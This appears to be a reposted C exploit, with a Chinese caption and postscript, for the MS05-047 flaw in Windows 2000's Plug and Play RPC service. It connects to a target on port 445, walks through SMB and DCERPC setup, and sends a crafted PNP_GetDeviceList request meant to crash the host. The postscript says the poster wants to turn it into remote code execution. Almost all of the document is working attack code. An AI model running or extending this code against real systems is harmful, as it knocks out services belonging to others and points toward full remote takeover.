
📄 ms05-047-2.c

📁 这就是microsoft windows的ms05-047的漏洞利用代码
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x00\x00\x00\x08\x00\x00\x01\x00\x00\x00";

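/*
 * Build the variable-length tail of the SMB TreeConnectAndX request at ptr:
 *   1. UNC (e.g. "\\\\host\\IPC$") widened to two bytes per character -
 *      each ASCII byte followed by 0x00 (UTF-16LE for ASCII input) - and
 *      terminated by a two-byte NUL;
 *   2. the service name "IPC" followed by two NUL bytes.  That is one byte
 *      more than an ASCII "IPC\0" needs, but main() derives its ByteCount
 *      value (2*strlen(UNC) + 7) from exactly this layout, so it is kept.
 *
 * For a non-empty UNC this writes exactly 2*strlen(UNC) + 7 bytes.  An
 * empty UNC now follows the same formula (7 bytes); the original emitted a
 * stray third NUL in that case, which no caller relied on.
 *
 * The caller must provide at least 2*strlen(UNC) + 7 bytes at ptr; nothing
 * here can verify that, so the caller has to check it before calling.
 *
 * Returns ptr advanced past the last byte written.  The original declared
 * a char * return type but never returned anything (undefined behaviour if
 * the result were used); main() ignores the result, so this is compatible.
 */
char *setup_tCon(char *UNC, char *ptr)
{
    const char *src = UNC;
    char *out = ptr;

    /* Widen each character: low byte = the ASCII value, high byte = 0. */
    for (; *src != '\0'; src++) {
        *out++ = *src;
        *out++ = '\x00';
    }

    /* Two-byte terminator of the wide string. */
    *out++ = '\x00';
    *out++ = '\x00';

    /* Service name "IPC" plus two NUL bytes. */
    *out++ = 'I';
    *out++ = 'P';
    *out++ = 'C';
    *out++ = '\x00';
    *out++ = '\x00';

    return out;
}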

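/* Print the green "OK" marker that follows each successful protocol step. */
static void report_ok(void)
{
    printf("\033[0;32mOK\033[0;39m\n");
}

/* Print the red "Failed" marker and terminate; every step in main() bails out this way. */
static void die_failed(void)
{
    printf("\033[0;31mFailed\033[0;39m\n");
    exit(-1);
}

/*
 * Send one prebuilt packet and read a single reply into resp.
 *
 * A send() failure is fatal (perror() with `what`, then exit), as it was in
 * the original inline code.  Returns the recv() result: bytes read, 0 on
 * orderly shutdown, -1 on error; callers treat anything shorter than the
 * bytes they inspect as a failure.  A single recv() may return only part of
 * an SMB message; the callers only look at the first ten bytes, which is
 * what the original code did as well.
 */
static int smb_exchange(int sock, const char *what, const void *pkt, size_t pktlen,
                        char *resp, size_t resplen)
{
    if (send(sock, pkt, pktlen, 0) < 0) {
        perror(what);
        exit(-1);
    }
    return (int)recv(sock, resp, resplen, 0);
}

/*
 * Entry point: walk the target through SMB negotiate, two session-setup
 * rounds, a tree connect to \\<ip>\IPC$, an NT Create on the pipe and a
 * DCERPC bind, then send the PNP_GetDeviceList request.  argv[1] is the host
 * name or IP address; port 445 is hard-coded.  Exits with -1 at the first
 * failing step.
 *
 * This is proof-of-concept denial-of-service code for MS05-047 (see the
 * banner); run it only against systems you are authorised to test.
 *
 * Changes relative to the original:
 *  - the TreeConnectAndX packet is sent with sizeof(header) + tail bytes,
 *    which is one byte past what is written into tConXpacket (the header is
 *    copied with sizeof-1, the tail is templen bytes).  The send length is
 *    kept, but the buffer is now zeroed first so that byte is 0x00 instead
 *    of uninitialised stack memory.  Whether the extra byte is intended
 *    padding cannot be told from the header literal, which is not shown in
 *    this part of the file - TODO confirm against its layout;
 *  - the ByteCount low byte was stored with a 1-byte memcpy from an int,
 *    which only picks the low byte on little-endian hosts;
 *  - sprintf() -> snprintf(), socket() result checked, sockaddr zeroed,
 *    tConXpacket capacity checked before setup_tCon() writes into it, the
 *    final send() checked instead of ignored, h_addr_list[0] used instead
 *    of the non-standard h_addr macro.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in target;
    struct hostent *host;
    int sock, ret, templen;
    char response[4096];
    char UNC[50], tConXpacket[150], targetIP[20];
    size_t hdrlen, unclen;

    if (argc < 2) {
        printf("Usage: upnp_getdevicelist_DOS <host name|ip address>\n");
        exit(-1);
    }

    printf("\n==========================================\n");
    printf("WIN2K UPNP interface DOS Attack\n");
    printf("Coded by Winny Thomas :-) \n");
    printf("==========================================\n\n");

    printf("[*] Resolving %s: ", argv[1]);
    host = gethostbyname(argv[1]);
    if (host == NULL || host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL)
        die_failed();
    report_ok();

    memset(&target, 0, sizeof target);   /* the original left sin_zero uninitialised */
    target.sin_family = AF_INET;
    memcpy(&target.sin_addr, host->h_addr_list[0], sizeof target.sin_addr);
    target.sin_port = htons(445);

    /* inet_ntoa() yields at most 15 characters; keep the copy bounded anyway. */
    snprintf(targetIP, sizeof targetIP, "%s", inet_ntoa(target.sin_addr));

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("Socket");
        exit(-1);
    }
    if (connect(sock, (struct sockaddr *)&target, sizeof target) < 0) {
        perror("Connect");
        exit(-1);
    }

    /*
     * Where a step inspects response[9]: with the usual 4-byte NetBIOS
     * session header in front of the SMB header that is the first byte of
     * the SMB Status field (consistent with the ByteCount offset 45 used
     * below), so a non-zero value means an error status.  The minimum reply
     * lengths (10 for negotiate, 11 elsewhere) are kept as the original had
     * them.
     */
    printf("[*] SMB Negotiation with %s: ", argv[1]);
    ret = smb_exchange(sock, "SMB Negotiate", SMB_Negotiate,
                       sizeof(SMB_Negotiate) - 1, response, sizeof response);
    if (ret < 10 || response[9] != 0)
        die_failed();
    report_ok();

    printf("[*] SMB Session setup ANDX 1 with %s: ", argv[1]);
    ret = smb_exchange(sock, "SMB_Session_setup_ANDX1", SMB_Session_setup_ANDX1,
                       sizeof(SMB_Session_setup_ANDX1) - 1, response, sizeof response);
    if (ret <= 10)   /* status byte deliberately not checked here, as in the original */
        die_failed();
    report_ok();

    printf("[*] SMB Session setup ANDX 2 with %s: ", argv[1]);
    ret = smb_exchange(sock, "SMB_Session_setup_ANDX2", SMB_Session_setup_ANDX2,
                       sizeof(SMB_Session_setup_ANDX2) - 1, response, sizeof response);
    if (ret <= 10 || response[9] != 0)
        die_failed();
    report_ok();

    printf("[*] SMB Tree Connect ANDX with %s: ", argv[1]);
    hdrlen = sizeof(SMB_TreeConnect_ANDX) - 1;   /* header literal without its NUL */
    snprintf(UNC, sizeof UNC, "\\\\%s\\IPC$", targetIP);
    unclen = strlen(UNC);
    /*
     * setup_tCon() appends 2*unclen + 7 bytes after the header, and the
     * send below covers one byte more than that; refuse to overflow the
     * fixed-size packet buffer.
     */
    if (hdrlen + 1 + 2 * unclen + 7 > sizeof tConXpacket) {
        fprintf(stderr, "tree connect packet too large for buffer\n");
        exit(-1);
    }
    memset(tConXpacket, 0, sizeof tConXpacket);
    memcpy(tConXpacket, SMB_TreeConnect_ANDX, hdrlen);
    setup_tCon(UNC, tConXpacket + hdrlen);
    templen = (int)(unclen * 2) + 9;
    tConXpacket[3] = (char)(43 + templen);     /* NetBIOS session length byte, as in the original */
    templen -= 2;
    tConXpacket[45] = (char)(templen & 0xff);  /* ByteCount low byte; host-endian independent */
    ret = smb_exchange(sock, "SMB_TreeConnect_ANDX", tConXpacket,
                       sizeof(SMB_TreeConnect_ANDX) + (size_t)templen,
                       response, sizeof response);
    if (ret <= 10 || response[9] != 0)
        die_failed();
    report_ok();

    printf("[*] SMB NT Create ANDX Request to %s: ", argv[1]);
    ret = smb_exchange(sock, "SMB_NTCreate_ANDX_Request", SMB_NTCreate_ANDX_Request,
                       sizeof(SMB_NTCreate_ANDX_Request) - 1, response, sizeof response);
    if (ret <= 10)
        die_failed();
    report_ok();

    printf("[*] DCERPC Bind to UPNP RPC Service at %s: ", argv[1]);
    ret = smb_exchange(sock, "DCERPC_Bind_RPC_Service", DCERPC_Bind_RPC_Service,
                       sizeof(DCERPC_Bind_RPC_Service) - 1, response, sizeof response);
    if (ret <= 10)
        die_failed();
    report_ok();

    printf("[*] PNP_GetDeviceList request to %s: ", argv[1]);
    /*
     * The reply to the final request is read but not inspected (the original
     * printed OK regardless of it); only a failed send() is now reported.
     */
    (void)smb_exchange(sock, "PNP_GetDeviceList_Request", PNP_GetDeviceList_Request,
                       sizeof(PNP_GetDeviceList_Request) - 1, response, sizeof response);
    report_ok();

    /* The descriptor is reclaimed at process exit. */
    return 0;
}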

PS: 这个我调试了一下，通用性不好，对 Windows 2000 也不能全部成功，关键在于协议，或许作者有所保留吧。有空看看能不能改成远程执行代码的 :)
